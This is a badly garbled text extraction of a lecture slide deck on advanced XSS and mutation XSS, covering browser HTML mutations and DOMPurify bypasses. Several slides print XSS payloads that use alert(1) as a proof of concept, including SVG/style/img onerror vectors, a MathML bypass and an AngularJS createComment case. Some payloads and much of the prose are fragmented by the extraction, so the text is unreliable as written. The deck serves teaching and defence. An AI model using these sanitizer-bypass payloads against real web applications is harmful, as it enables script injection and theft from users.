We b & B r o ws e r S e c u r i t y D a y T - - PowerPoint PPT Presentation

SLIDE 1

We b & B r

• ws

e r S e c u r i t y

D a y T w

• :

A d v a n c e d X S S

A lecture by Dr.-Ing. Mario Heiderich

mario@cure53.de || mario.heiderich@rub.de

This is the day where we cover crazy stufg. Crazy.

SLIDE 2

O u r D e a r L e c t u r e r

• D

r .

• I

n g n g . M a r i

• H

e H e i d e r d e r i c h

• E

x

• R
• R

e s e a r a r c h e r a n a n d n

• w

L e c t u r e r , R u h r

• U
• U

n i B

• c

h u m

• P

h D T h e s i s a b

• u

t C l i e n t S i d e S e c u r i t y a n d D e f e n s e

• F
• u

n d e r & D i r e c t

• r
• f

C u r e 5 3 5 3

• P

e n t e s t

• &

S e c u r i t y

• F

i r m l

• c

a t e d i n B e r l i n

• S

e c u r i t y , C

• n

s u l t i n g , Wo r k s h

• p

s , T r a i n i n g s

• A

s k f

• r

a n i n t e r n s h i p i f t h e f

• r

c e i s s t r

• n

g w i t h y

• u
• P

u P u b l i s h e d A u t h

• r

a n a n d S p e a k a k e r

• S

p e c i a l i z e d

• n

H T M L 5 , D O M a n d S V G S e c u r i t y

• J

a v a S c r i p t , X S S a n d C l i e n t S i d e A t t a c k s

• M

a i M a i n t a i n s D O M P u M P u r i f y f y

• A

t

• p

n

• t

c h J S

• n

l y S a n i t i z e r , a l s

• ,

c

• u

p l e

• f
• t

h e r p r

• j

e c t s

• C

a n a n b e c

• n

t a c a c t e d d b u t p r e f e r s n

• t

t

• b

e

• ma

r i

• @c

u r e 5 3 . d e

• ma

r i

• .

h e i d e r i c h @r u b . d e

SLIDE 3

A c t O n e

A d v d v a n a n c e d X d X S S

SLIDE 4

A n d , b e f

• r

e g e t s t a r t e d . L e t ' s t h i s t h i n k n k a a b

• u

t S e l t S e l f

• X

S S . A n A n d

• n

e k n e k i n d

• n

d

• f

C C S R F R F . A n d h

• w

w e c a n a b u s e t h a t .

SLIDE 5

[ . . . ]

SLIDE 6

Mu t a t i

• n

s i n t h e D O M: mX S S

• T

h i s a t t a c k i s b a s i c a l l y a n i g h t ma r e c

• me

t r u e . B r

• w

s e r s t u r n e d a g a i n s t w e b a p p s .

• I

ma g i n e , t h e b r

• w

s e r t u r n s h a r ml e s s H T M L i n t

• a

d a n g e r

• u

s a t t a c k v e c t

• r

s .

• T

h e s e r v e r w i l l a s s u me s a n e ma r k u p a n d n

• r

i s k

• T

h i s i s s u e i n d e e d e x i s t s , fj r s t r e p

• r

t e d i n 2 6

• „

B r

• k

e n P r i n t

• P

r e v i e w “ h t t p : / / i s . g d / f L V S c q

• S

t r i n g

• M

u t a t i

• n

i n c e r t a i n D O M p r

• p

e r t i e s

• R

e s u l t : µ X S S , mX S S

• r

“ M u t a t i

• n

X S S ”

• B

a c k t h e n , a fg e c t e d a p p l i c a t i

• n

s a n d l i b r a r i e s :

• 2

+ M i l l i

• n

l i b r a r i e s a c c

• r

d i n g t

• G

i t h u b

• 6

+ v e c t

• r

c l a s s e s , a fg e c t w e b ma i l e r s , e v e r y

• n

e w i t h a R T E

• Y

a h

• !

M a i l , O WA , H

• t

ma i l , S h a r e p

• i

n t , e t c .

• A

n d D O M P u r i f y

• f

c

• u

r s e , ma s s i v e l y s

• L

e t ' t ' s h a h a v e a e a c c l

• s
• s

e e r e e r l

• k

a a t t t h i t h i s !

Yay! DEMO

SLIDE 7

O r , t

• b

e mo r e c l e a r

• A

t t a c k e r s u b mi t s H T M L

• S

e r v e r r e c e i v e s i t t

• s

a n i t i z e

• S

a y s , t h a t l

• k

s s a f e , a l l fj fj n e

• S

e n d s i t b a c k t

• b

r

• w

s e r

• B

r

• w

s e r r e c e i v e s H T M L

• R

e n d e r s i t i n i t i a l l y , a l l fj fj n e

• S
• me

D O M l

• g

i c fj d d l e s w i t h i t

• B

r

• w

s e r r e

• r

e n d e r s , H T M L mu t a t e s

• I

n j e c t e d J a v a S c r i p t a c t i v a t e s a n d fj r e s

SLIDE 8

N e w V a r i a t i

• n

s

B

• t

h v e c t

• r

s i d e n t i fj e d a n d p u b l i s h e d b y G a r e t h H e y e s <%/z=%&gt&lt;p/&#111;nresize&#x3d;alert(1) &#111;nresize&#x3d;alert(1)//> <div='/x=&#39&gt&lt;iframe/ &#39&gt&lt;iframe/

• nlo

load= d=ale lert( t(1)& )&gt>

SLIDE 9

SLIDE 10

O t h e r B r

• ws

e r s

F i r e f

• x

c a n n

• t

b e t r u s t e d w i t h i n n e r H T M L a n d S V G <script> document.write('<svg><p><style><img src="</st style le><i <img g src rc=x x

• n
• nerr

rror= r=ale lert( t(1)/ )//"> ">') </script> C h r

• me

c a n n

• t

b e t r u s t e d w i t h U n i c

• d

e ( s a d l y fj x e d i n C h r

• me

6 2 ) <a href=&#x3 x3000 00;javascript:alert(1)>CLICK

SLIDE 11

O t h e r B r

• ws

e r s

C h r

• me

r e c e n t l y fj x e d a n

• t

h e r mX S S p r

• b

l e m <math><annotation-xml encoding="text/html"><xmp>&lt; &lt;/xmp>&lt; &lt;img src=x onerror=alert(1)></xmp></annotation- xml></math>

SLIDE 12

SLIDE 13

SLIDE 14

C h e c k

• u

t t h e v i d e

• !

h t t p s : / / i s . g d /

• R

N B L Z A n d a l l t h e c

• d

e ! h t t p s : / / i s . g d / S d P S K

SLIDE 15

B u t i t g e t s wo r s e

• A

u t u mn 2 1 9 w a s mX S S s e a s

• n

. S a d l y f

• r

u s .

• D

O M P u r i f y g

• t

h i t b y a g

• d

d

• z

e n

• f

b y p a s s e s

• F

i r s t f

• u

n d b y a 3

r d

P a r t y , M i c h a B e n t k

• w

s k i

• T

h e r e s t t h e n f

• u

n d “ i n t e r n a l l y ”

• T

h e r e w a s t w

• r
• t

c a u s e s

• A

n i n t e r n a l s w i t c h i n d

• c

u me n t t y p e s c h a n g e s t h e p a r s e r t y p e

• A

s u d d e n c h a n g e i n d

• c

u me n t s t r u c t u r e c h a n g e s t h e p a r s e r t y p e

SLIDE 16

mX S S R

• t
• C

a u s e O n e

• A

n i n t e r n a l s w i t c h i n d

• c

u me n t t y p e s c h a n g e s t h e p a r s e r t y p e

• T

h e b r

• w

s e r t h i n k s i t ’ s X M L , t h e n t h i n k s i t ’ s H T M L

• O

n c e t h a t “ r e c

• n

s i d e r a t i

• n

” h a p p e n s , H T M L g e t s i n t e r p r e t e d d i fg e r e n t l y

• T

h i s c a u s e s b y p a s s e s , e v e n a n d e s p e c i a l l y i n D O M s a n i t i z e r s l i k e D O M P u r i f y

SLIDE 17

<svg></p><style> <a id="</style><img src=1

• nerror=alert(1)>">

SLIDE 18

<svg></p><style> <a id="</style><img src=1

• nerror=alert(1)>">

SLIDE 19

<svg><p></p><style> <a id="</style><img src=1

• nerror=alert(1)>">

SLIDE 20

mX S S R

• t
• C

a u s e T wo

• A

s u d d e n c h a n g e i n d

• c

u me n t s t r u c t u r e c h a n g e s t h e p a r s e r t y p e

• T

h e s w i t c h i s t r i g g e r e d b y f

• r

e x a mp l e e l e me n t r e mo v a l

• B

r

• w

s e r t h i n k s X M L , e l e me n t g e t s r e mo v e d , b r

• w

s e r n

• w

t h i n k s H T M L

• A

n d a s t h a t h a p p e n s , t h e H T M L g e t s i n t e r p r e t e d d i fg e r e n t l y

SLIDE 21

<noembed><svg><b><style><b title='</style><img src=x

• nerror=alert(1)>'>

SLIDE 22

<noembed><svg><b><style><b title='</style><img src=x

• nerror=alert(1)>'>

SLIDE 23

<noembed><svg><b><style><b title='</style><img src=x

• nerror=alert(1)>'>

This element we don’t want, let’s remove it.

SLIDE 24

removed<svg><b><style><b title='</style><img src=x

• nerror=alert(1)>'>

And boom, we force the parser into XML-mode because SVG. Harmless becomes harmful.

SLIDE 25

removed<svg></svg><b></b> <style><b title='</style><img src=x

• nerror=alert(1)>'>

SLIDE 26

Mu t a t i

• n

s a r e h e r e t

• s

t a y

• We

c a n

• b

s e r v e t h a t mu t a t i

• n

s c a n n

• t

b e a v

• i

d e d

• P

r

• b
• b

l e m e m

• n

e : C a p a b i l i t y c h a n g e s

• N
• S

c r i p t , N

• E

mb e d a n d t h e l i k e s

• P

r

• b
• b

l e m e m t w

• :

C

• n

t e x t c h a n g e s

• F

r

• m

S V G t

• H

T M L a n d b a c k , M a t h M L

• P

r

• b
• b

l e m e m t h r h r e e e e : N

• d

e R e mo v a l s

• F
• r

c i n g t h e a b

• v

e u s i n g n

• d

e r e mo v a l

• T

h e s e p r

• b

l e ms a r e h a r d t

• t

a c k l e a n d w i l l l i k e l y a c c

• mp

a n y u s u n t i l w e h a v e s

• me

t h i n g b e t t e r t h a n H T M L

SLIDE 27

SLIDE 28

A n g u l a r J S mX S S C

• r

n e r C a s e

• I

n r e c e n t A n g u l a r J S v e r s i

• n

s , w e c a n

• b

s e r v e a n i n t e r e s t i n g mX S S c

• r

n e r c a s e

• T

h i s t i me i t ' s b a s e d

• n

u n s a f e h a n d l i n g

• f

document.createComment()

<!doctype html> <html ng-app> <head> <script src="angular.min.js"></script> </head> <body> <b class="ng-include:'somefile?- ?-- &g &gt;& ;&lt; t;svg vg&so sol;o ;onlo load= d=ale lert& t&lpa par;1 ;1&rp rpar; r;&gt gt;'">HELLO</b> <button onclick="body.innerHTML+=1">do the mXSS thing</button> </body>

SLIDE 29

[ . . . ]

SLIDE 30

D a y T wo : D

• n

e

• T

h a h a n k n k s a a l l

• t

! t !

• T
• mo

r r r r

• w

, m mo r e . e .

• A

n A n y q y q u e s t i t i

• n

s ? P i ? P i n g m n g me . e .

• ma

r i

• @c

u r e 5 3 . d e